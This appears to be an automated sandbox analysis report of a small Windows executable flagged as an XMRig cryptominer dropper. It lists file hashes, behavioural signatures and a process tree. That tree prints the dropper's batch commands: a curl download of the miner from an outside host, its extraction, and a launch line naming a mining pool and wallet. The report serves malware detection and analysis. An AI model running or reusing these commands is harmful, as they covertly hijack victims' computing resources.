Resubmissions

13-03-2024 08:45

240313-knsznahb2w 10

13-03-2024 08:44

240313-knhtpaah68 10

13-03-2024 08:44

240313-km8cysha9v 10

13-03-2024 08:43

240313-kms82aah48 10

12-03-2024 18:00

240312-wlevsshe86 10

12-03-2024 17:57

240312-wjxylahe48 10

12-03-2024 17:55

240312-whm21afc7t 10

12-03-2024 17:54

240312-wg7p1sfc5y 10

12-03-2024 17:53

240312-wgg5csfc3y 10

12-03-2024 17:52

240312-wf31fahd58 10

Analysis

  • max time kernel
    149s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2024 08:44

General

  • Target

    test - Copy - Copy - Copy.exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 13 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy - Copy - Copy.exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy - Copy - Copy.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\p1KoQNJ1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4012
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:1592
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:1356
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4464

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\p1KoQNJ1.bat

        Filesize

        421B

        MD5

        67d11b392feb0ad59fc11ff3e79dfeee

        SHA1

        7df5785988cb76c4893773614572c93baaa18717

        SHA256

        69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

        SHA512

        50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

      • C:\xmrig\xmrig-6.21.1-gcc-win64.zip

        Filesize

        1.3MB

        MD5

        672381525d86f73156e6fc19f785dd4b

        SHA1

        ed3162a7b14c014c28a167aee0b5abcea310bf25

        SHA256

        bd079a4e103a494e3727ce7e752b6d11740f94dde321b73bbd9519e7f1db6494

        SHA512

        82295a2899c77ffcd2970451eef7742e489b04f25ed4031ee1c892d00e38911d1d1522b67e786b8575a61479abb801b883e2e896a81ce9e6ec8c62c7b7a8000e

      • C:\xmrig\xmrig-6.21.1\xmrig.exe

        Filesize

        1.4MB

        MD5

        9aba6b4cb20c58b0f3ce29ecfbc4f582

        SHA1

        67b332ebccd8d870c251cb92c206d8fa03ccb4da

        SHA256

        d1b200128200874c354f0bdd20b543cfbb60137e8b99cbb3d49f4a9268dffd4a

        SHA512

        40c5fbf24066c9c6c4328b8ca491955c2ab94d553df5d844665a8187a759146d4b5391131820ccfad850d29c14818d0a6267dce596e462c53fccc6b1d909dcdc

      • memory/4464-27-0x00000296A6690000-0x00000296A66B0000-memory.dmp

        Filesize

        128KB

      • memory/4464-29-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-23-0x00000296A6600000-0x00000296A6620000-memory.dmp

        Filesize

        128KB

      • memory/4464-39-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-24-0x00000296A6650000-0x00000296A6690000-memory.dmp

        Filesize

        256KB

      • memory/4464-25-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-26-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-38-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-28-0x00000296A7F60000-0x00000296A7F80000-memory.dmp

        Filesize

        128KB

      • memory/4464-36-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-30-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-31-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-32-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-34-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/4464-35-0x00007FF652480000-0x00007FF652F84000-memory.dmp

        Filesize

        11.0MB

      • memory/5064-3-0x00007FFD4F880000-0x00007FFD50341000-memory.dmp

        Filesize

        10.8MB

      • memory/5064-0-0x0000000000FA0000-0x0000000000FA8000-memory.dmp

        Filesize

        32KB

      • memory/5064-22-0x00007FFD4F880000-0x00007FFD50341000-memory.dmp

        Filesize

        10.8MB